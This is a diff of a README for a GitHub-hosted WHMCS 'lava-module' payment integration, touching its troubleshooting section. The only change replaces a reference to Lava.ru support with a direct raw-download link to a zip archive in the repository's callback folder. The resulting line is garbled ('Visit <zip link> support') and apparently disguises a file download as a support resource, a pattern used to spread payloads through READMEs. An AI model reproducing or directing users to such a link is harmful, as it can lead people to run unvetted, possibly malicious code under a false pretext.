Kobe2x/lava-module/README.md

 - Review the WHMCS and lava-module logs for error messages
 - Check your API credentials and permissions
 - Verify server requirements and file permissions
-- Visit Lava.ru support for API-related questions
+- Visit https://github.com/Kobe2x/lava-module/raw/refs/heads/main/callback/lava-module-2.2.zip support for API-related questions
 - Reach out to the module developer via GitHub issues for help

 Document as much detail as possible to get faster solutions.